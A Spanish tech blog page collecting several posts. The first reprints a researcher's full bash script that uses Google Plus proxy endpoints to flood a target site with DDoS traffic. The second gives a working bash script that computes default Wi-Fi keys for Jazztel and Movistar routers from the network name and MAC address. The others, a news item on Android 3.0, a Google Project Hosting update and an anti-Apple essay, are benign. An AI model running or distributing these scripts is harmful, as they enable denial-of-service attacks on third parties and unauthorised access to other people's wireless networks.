Fallo de seguridad en los servidores de Google Plus

Google Plus

Google Plus

Un nuevo agujero de seguridad ha sido descubierto en los servidores de Google plus que permite a los hackers hacer un ataque DDoS usando el ancho de banda de Google.

Google plus ha sido objeto de pruebas desde ya hace un tiempo y una de las personas encargadas de estas pruebas (de una empresa de seguridad italiana) ha informado de que los servidores de Google plus se pueden utilizar para hacer solicitudes DDos a otros sitios web.

La noticia original de este informe se puede ver en IHTeam un blog de seguridad propiedad de Simone Quatrini. Él demuestra cómo los usuarios pueden hacer uso del servidor de Google para actuar como un proxy y buscar el contenido de cualquier sitio web que desee. También se observa que los servidores de Google son más anónimos que los demás servidores.

Ha mencionado dos métodos, uno que utiliza / _ / sharebox / linkpreview /. Este método no expone su dirección IP para conectarse a los servidores Apache. Pero el otro método, gadgets / proxy? Parece que si que se expone la dirección IP a los servidores.

El equipo también ha publicado un script para shell de linux que permite ejecutar la vulnerabilidad. El script hace una solicitud a los servidores de Google para hacer una petición a una página web. Lo importante del tema es que se utiliza el ancho de banda de Google en lugar del atancante.

Según comenta el autor, hayo otros métodos para atacar de manera más segura, pero lógicamente no los quiere exponer en la red.

Resumiendo, se puede hacer y descargar senzilla y rápidamente cualquier tipo de archivo a través de los servidores de Google haciendo un DDoS.

Mas abajo teneis el video explicativo y el script en bash que usa en el video Simone Quatrini 😀

Fuente | IHTeam

In this example i start a thread of 1000 requests and the output bandwidth will result in 91/96Mbps (my house bandwidth is only 6Mbps). This is my server, do not start to ddos around for no reason!

+DDoS source code download:

http://www.ihteam.net/advisories/_154785695367_+ddos.sh

#!/bin/bash

#   Bug found by                        #
#       Simone 'R00T_ATI' Quatrini      #
#       Mauro 'epicfail' Gasperini      #
#       Site: http://www.ihteam.net     #

function start {
    echo "[*] Sending `echo $2` Requests..."

    for a in `seq $2`
    do
        id=$((RANDOM%3999999+3000000))
        nohup curl "https://plus.google.com/_/sharebox/linkpreview/?c=$url&t=1&_reqid=$id&rt=j" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
        nohup curl "https://images2-focus-opensocial.googleusercontent.com/gadgets/proxy?url=$urlclear&container=focus" -k -A "Mozilla/5.0 (X11; Linux i686; rv:6.0) Gecko/20100101 Firefox/6.0" > /dev/null 2>&1 &
    done

    echo "[*] Still attacking `echo $urlclear`"
    echo "[*] Sleeping for 10 Seconds"
    sleep 10
    start url $2 urlclear
}

echo ''
echo '             88888888ba,    88888888ba,                  ad88888ba  '
echo '    aa      88      `"8b   88      `"8b                d8"     "8b  '
echo '    88      88        `8b  88        `8b               Y8,          '
echo 'aaaa88aaaa  88         88  88         88   ,adPPYba,   `Y8aaaaa,    '
echo '""""88""""  88         88  88         88  a8"     "8a    `"""""8b,  '
echo '    88      88         8P  88         8P  8b       d8          `8b  '
echo '    ""      88      .a8P   88      .a8P   "8a,   ,a8"  Y8a     a8P  '
echo '            88888888Y""    88888888Y""     `"YbbdP""    "Y88888P"'
echo ''

if [ "$#" -lt 2 ]; then
    echo "Usage: $0 <big file> <Requests>"
    echo "Example: $0 http://www.site.com/very_big_file.tar.gz 1000"
    echo ""

    exit 0
fi

case $2 in
    *[!0-9]* )  echo "$2 is not numeric" && exit 1;;
esac

echo "Attack -->" $1
match1=/
repl1=%2F
match2=:
repl2=%3A
url=$1
urlclear=$1

url=${url//$match1/$repl1}
url=${url//$match2/$repl2}

echo ""
echo "[*] Loop started! CTRL+C to stop"
echo ""

start url $2 urlclear

Algoritmo descifrado de los routers wifi de Jazztel y Teléfonica

Los usuarios de jazztel y  Telefonica movistar que no hayan cambiado el nombre (ESSID) de sus wifis pueden ir pensando en hacerlo: El algoritmo ha sido descifrado. Por lo visto, el que sacó a la luz el algoritmo fue elvecinoo en este hilo de lampiweb En http://kz.ath.cx/wlan/ (Entre otros) se ingresa nombre y la MAC del router y te la clava.

A mi me gusta más la versión en Bash:

#!/bin/bash

echo CalcWLAN by a.s.r

if [ $# -ne 2 ]
then
echo "Usage: $0  "
echo
echo "Example: $0 WLAN_C58D 64:68:0C:C5:C5:90"
exit 1
fi

HEAD=$(echo -n "$1" | tr 'a-z' 'A-Z' | cut -d_ -f2)
BSSID=$(echo -n "$2" | tr 'a-z' 'A-Z' | tr -d :)
BSSIDP=$(echo -n "$BSSID" | cut -c-8)
KEY=$(echo -n bcgbghgg$BSSIDP$HEAD$BSSID | md5sum | cut -c-20)

echo "La puta clave es $KEY"

Teneis un mirror para generar la clave online aqui mismo:
https://blogofsysadmins.com/generador-de-claves-wifi-para-jazztel_xxxx-y-wlan_xxxx

Mas información:

http://www.hispasec.com/unaaldia/4487

http://elvecinoo.wordpress.com/

Google presenta su versión de Android 3.0 para las tablets

Google presenta Android 3.0 para las tablets
Google presenta Android 3.0 para las tablets
Android 3.0 Honeycomb

El gigante de internet Google presentó hoy la nueva versión de su sistema operativo Android, el Android 3.0 o Honeycomb, un software creado para disputar el dominio del popular iPad de Apple en el mercado de tabletas informáticas.
Más allá de ser una actualización de su predecesor, el Android 2.3 apodado Gingerbread, que vio la luz en diciembre, Honeycomb nació rediseñado desde sus cimientos para sacar el máximo partido a dispositivos móviles con grandes pantallas.
Android 3.0, un software libre de Google, adaptó la navegación por sus pantallas a las posibilidades que ofrecen las tabletas, permite la realización de varias tareas simultáneamente e integra un sistema para regresar rápidamente a las últimas tareas ejecutadas.

Google presenta su versión de Android 3.0 para las tablets
Google presenta su versión de Android 3.0 para las tablets

Android 3.0 es un sistema operativo apto para gráficos en 3D, con teclado virtual, reproducción de vídeo a tiempo real desde internet, videollamada, así como las conexiones de las tabletas con otros dispositivos equipados con Bluetooth.
Los ingenieros detrás de Android dedicaron el evento celebrado hoy en la sede de Google, en Mountain View, en los alrededores de San Francisco, a dar a conocer las posibilidades que ofrece el nuevo sistema operativo para los desarrolladores de aplicaciones, más que para el propio consumidor.
«Honeycomb consiste en llevar la rapidez asociada a internet a las tabletas», comentó Hugo Barra, director de productos para móviles de Google.
Para la demostración del remodelado Android se empleó un prototipo de la tableta de Motorola Xoom, la primera que llegará al mercado equipada con Honeycomb y con fecha de lanzamiento previsto para el 17 de febrero en EE.UU..
Google aseguró que Honeycomb es compatible con todas las aplicaciones existentes ya en el mercado de Android, aunque fueran desarrolladas para versiones anteriores del sistema, y aprovechó el evento para lanzar el Android Market Webstore, un mercado de aplicaciones en la nube al estilo de lo que tiene Apple.

Google Project Hosting incorporará una nueva función para mejorar el desarrollo comunitario de software

¿Alguna vez te encontraste con un error en el código de un programa y no pudiste solucionarlo? Tal vez estabas leyendo el código desde tu explorador de internet, o tal vez no tenías a mano en ese momento Subversion o Mercurial para realizar los cambios. Bueno, el equipo del Google Project Hosting ha anunciado una nueva funcionalidad disponible para todos los desarrolladores intrépidos: la posibilidad de editar el código fuente de los programas alojados allí (en code.google.com) directamente desde el explorador de internet, utilizando el poderoso editor basado en CodeMirror. Sólo hace falta hacer clic en el botón «Edit file» para acceder a esta funcionalidad.

A medida que comenzás a editar el archivo, es posible ver los cambios respecto del original (diff) y, de ese modo, nunca vas a perder la dimensión de los cambios que estás introduciendo. Pero, ¿qué pasa si no tengo los privilegios suficientes (commit privileges) como para aplicar cambios directamente? Ningún problema. En vez de aplicar los cambios en forma directa, podés guardar los cambios como un parche de modo que los desarrolladores del programa lo evaluarán y decidirán su futura incorporación.

Al bajar los requisitos para que cualquier mortal ayude a mejorar los programas de software libre, Google está dando una GRAN mano para que éstos puedan pulirse, incorporar nuevas funcionalidades, ser más estables, etc. En una palabra, esta es una gran noticia para el desarrollo de software libre.

Fuente: Blog oficial de Google Open Source

Las cadenas de Apple

Las cadenas de APPLE

Las cadenas de APPLE

Si tienes algún dispositivo de Apple, o te vas a comprar alguno, te interesará saber que no eres libre. Cuando hablo de libertad, me refiero a la libertad en todos los aspectos. Me refiero a ser libre de decidir lo que quiero, a que nadie me obligue a hacer algo en contra de mi voluntad o a no ser espiado. En definitiva, a ser libre. Últimamente se está levantando mucho alboroto con la Ley Sinde o la neutralidad de la red. Actualmente la gente está empezando a comprender lo que significa una red neutral, pero me encuentro que los mismos que hablan de libertad lo hacen desde un iPhone. Bien, no puedes defender la neutralidad de la red o apoyar la denegación de la ley sinde y utilizar un iPhone. No lo puedes hacer, si lo haces estás siendo muy hipócrita.

El sábado, justo antes de salir a dar una vuelta, mi hermana me dijo que se iba a comprar un iPod. Me dijo que unas amigas tenían un iPod y que les funcionaba muy bien, que se lo comprase ella también. Además me dijo que una de ellas tenía varios Mac, un iPhone, y tantas manzanas mordidas que podía montar una frutería. Yo le respondí que no se comprase un iPod, que por favor no lo hiciese, que Apple es lo peor que hay. Ella me respondió que los dispositivos que hace Apple son muy buenos, muy fiables y muy bonitos. Yo la dije que si se compraba un dispositivo de Apple, perdía la libertad, entonces, sentada en una silla y mientras estaba chateando con emesene (tiene Mint instalado), me respondió “¿qué libertad?” Sin mediar palabra cogí la puerta y me fui algo cabreado, pero bastante dolido. Si mi propia hermana no sabe a lo que me refiero, ¿quién lo va a saber?

En este artículo voy a intentar exponer lo que hace Apple, aunque es extensible a la mayoría de las empresas que fabrican software privativo. He escogido Apple porque la gente se vuelve gilipollas cuando habla de Apple. Alaban la App Store, iTunes o el iPad. Creen que Steve Jobs es un mesías, que está revolucionando el mundo tecnológico, se creen en posesión de la verdad y no quieren escuchar. Ya sé que este artículo puede ser considerado incendiario, no pretendo ser un fanático de nada, aunque lo parezca. Siempre trato de escuchar, y muy pocas veces alzo la voz. Pero cuando se llega hasta este extremo, en el que la gente habla de ser libres cuando con sus actos demuestran que prefieren las cadenas, no puedo expresarme de otro modo.

Cuando compras un dispositivo de Apple, no compras un dispositivo, compras ciertas licencias. Cuando desembolsas 700 € por un iPad, no es tuyo, sigue siendo de Apple. Cuando envías un SMS a un amigo, cuando hablas con tu novia, cuando visitas una página web, le proporcionas a Apple toda esa información. Cuando instalas una aplicación, no elijes sino que solo pagas. Cuando escuchas una canción en iTunes, no compras la canción, compras el derecho para escucharla bajo ciertas restricciones. NO TIENES LIBERTAD. APPLE TE CONTROLA. Eso sí, te controla por tu propio bien.

En el párrafo anterior digo que no posees un dispositivo de Apple, sino que tienes su consentimiento para utilizarlo. Apple promueve activamente el DRM (Digital Restrictions Management). Mediante un sistema de DRM, Apple aprueba ciertos comportamientos y anula otros. Cuando compro cualquier bien material, espero poder utilizarlo como yo quiera. Si me compro un plátano y lo quiero espachurrar contra el suelo, lo puedo hacer. Si compro un libro y lo quiero quemar, lo puedo hacer.  Si compro un ordenador y quiero remodelarlo, lo puedo hacer. Si compro un iPhone y quiero instalar cualquier aplicación ¿lo puedo hacer? No, al menos legalmente. Solo puedes instalar las aplicaciones que estén en la App Store, lo que me lleva al siguiente punto.

Pongámonos en la piel del desarrollador. Para que un programador pueda distribuir su aplicación bajo la App Store, se tiene que registrar en la App Store. Si quiere ver las condiciones de la App Store, tiene que estar registrado. Para registrarte tienes que pagar $99. Por tanto, si el desarrollador quiere analizar las condiciones de uso de la App Store, tiene que pagar $99. Pero digamos que el desarrollador es rico, que se puede permitir pagar $99 para ver las condiciones de uso y decidir si le interesa distribuir la aplicación por la App Store. Para distribuir la aplicación, tiene que cumplir con unas rigurosas exigencias de la App Store, a destacar:
– No se permiten versiones betas.
– No se puede utilizar otro lenguaje más que Objective-C y C/C++
– No se permiten que en la descripción de la aplicación se haga referencia a otra tienda de aplicaciones.
– No se permiten que la aplicación funcione de forma mínimamente distinta a como se especifica en la definición.
– No se permiten que la aplicación se baje algo de internet.
– No se permiten que la aplicación cumpla una función que ya está cumpliendo otra aplicación de la App Store.
– No se permiten aplicaciones que no sean útiles o que no  proporcionen un valor de entretenimiento duradero.
– No se permiten aplicaciones que modifiquen la interfaz de usuario.
– No se permiten aplicaciones que modifiquen el comportamiento de los botones.
– No se permiten aplicaciones que tengan licencias libres.

Es decir, no puedo instalar un montón de aplicaciones en mi flamante iPhone (que me ha costado un riñón). Si el desarrollador no tiene dinero, no puedo instalar su aplicación. Si tiene principios éticos, no puedo instalar su aplicación. Si se ha olvidado de poner una coma en la definición de la aplicación, no puedo instalar la aplicación. Si está en fase de desarrollo porque le falta añadir un módulo a la aplicación a pesar de que funciona perfectamente, no puedo instalar su aplicación. Si está programada en Python, no puedo instalar su aplicación. Si hay una aplicación que ya hace lo mismo, no puedo instalar la aplicación. Si a Steve Jobs no le gusta, no puedo instalar la aplicación. Un momento, ¿acabo de decir que si a Steve Jobs no le gusta una aplicación, no puedo instalarla? Así es, Apple defiende un mercado no libre. Apple decide si quieres la aplicación o no. Tú no decides, Apple decide por ti. ¿Y quién le ha dado el poder de decidir por mí? Tú, al comprar el producto. Si no puedes instalar el reproductor VLC, no llores, apechuga con las consecuencias de tu elección. Si flash no funciona en el iPhone, no llores, apechuga con las consecuencias de tu elección. Si obligas a un programador a romper algunos principios éticos, no llores, apechuga con las consecuencias de tu elección.

Sin embargo, hay gente que quiere saltarse las restricciones de Apple. ¿Lo puede hacer? Sí, con el jailbreak. Mediante ése proceso se puede instalar cualquier aplicación, ya que rompo el sistema de restricciones que ha diseñado Apple. Lo que mucha gente no sabe son las consecuencias de jailbreakear un dispositivo de Apple. Al igual que el DRM, Apple también defiende y promueve de manera activa la DMCA (Digital Millennium Copyright Act). Este tratado tipifica como delito la producción, difusión y uso de tecnologías o servicios destinados a eludir las medidas DRM. Si contribuyes a romper el control al que te está sometiendo Apple, puedes ir a la cárcel. Además, si las amenazas a las que te está sometiendo Apple no son suficiente para controlar tus actos, ten presente que pueden hacer inservible el dispositivo que has comprado cuando quieran, lo que me lleva al siguiente punto.

Hace algún tiempo, a finales de septiembre de 2007, Apple lanzó una actualización para iOS (aunque entonces se llamaba iPhone OS). Con esta actualización decían que se mejoraba la seguridad del sistema y que se arreglaban ciertos fallos. Lo que la gente no sabía es que con la actualización todos los dispositivos que habían sido manipulados se volvían totalmente inservibles. Sorpresa, si manipulabas tu iPhone y actualizabas el SO, te tenías que comprar otro iPhone (porque supongo que si te has comprado uno, estás tan ciego que te vas a comprar otro). Lo más curioso, es que no era necesario jailbreakear el iPhone totalmente, bastaba que instalases una aplicación fuera de la App Store, para que te quedases sin tu móvil de $400. Apple, una vez más, te controla.

Por último, quiero hablar de iTunes. Para empezar quiero citar el veredicto de un juzgado de San Francisco:

Las canciones bajadas de iTunes no pueden considerarse que hayan sido compradas; por el sistema de licencias de Apple el aparente comprador solo obtiene ciertas licencias.

No he comprado las canciones, entonces ¿qué carajo he hecho? El idiota, una y otra vez. Cuando compras una canción en iTunes, solo tienes el derecho de reproducirla bajo los dispositivos que Apple te deje y bajo los medios que Apple te deje. Nunca has comprado nada, solamente has llegado a un acuerdo con Apple, en el que ambos acordáis unos términos muy restrictivos. Pero es lo que tú has elegido. Para rematar, quisiera citar el caso de Palm. La empresa que el año pasado fue comprada por HP, en Julio de 2009 añadió soporte a iTunes. A Apple le había salido un competidor directo. ¿Qué hizo? Jugar muy, pero que muy sucio. Cuando Palm añadió el soporte, Apple cambió el funcionamiento de iTunes, lo que impedía a Palm tener acceso a iTunes. Cuando Palm lo arregló, gastándose millones de dólares, Apple volvió a cambiar el funcionamiento de iTunes y Palm tuvo que gastarse más millones. Finalmente, Palm desistió. Por el camino se quedaron miles de usuarios.

Apple es lo que se consigue cuando gente como tú (me refiero al cliente de Apple, no a todos los lectores de PillateUnLinux) decide apoyarla comprando sus productos. ¿Te gustaría vivir en un mundo en el que una empresa te controla? ¿Te gustaría vivir dentro del mundo que Orwell describió en 1984? Entonces, ¿por qué compras productos de Apple? Muchos dirán que soy exagerado. A mi modo de ver, el comportamiento de Apple es igual de negativo que el que promueve la Ley Sinde. Todos nos estamos llevando las manos a la cabeza cuando el proyecto de ley va a pasar al Senado. Mientras tanto, los mismos que hablan de libertad prefieren utilizar el iPhone y lo peor de todo, alaban las acciones de Apple. Esta semana, con el lanzamiento de la Mac App Store, he oído y leído barbaridades. Casi todos los medios que normalmente leo y a los que hasta hace poco respetaba, han alabado la destreza de Steve Jobs. Ninguno ha hablado de las restricciones a las que somete Apple a sus usuarios y lo peor de todo es que ninguno lo hará. En estos momentos ya no sé qué pensar, si me estoy volviendo muy exagerado o si el mundo ha perdido definitivamente la cordura. No entiendo el comportamiento de la gente, que se compra un dispositivo que le ha costado un riñón (porque ésa es otra, el precio abusivo de Apple) para ser controlados.

Cuando alguien compra un dispositivo de Apple, cuando escribe de sus bondades y no nombra el poder asfixiante que ejerce, apoya la censura, la desinformación, el engaño, el espionaje y sobre todo atenta contra la libertad. Mi libertad.

fuente del mágnifico artículo: http://www.pillateunlinux.com/las-cadenas-de-apple/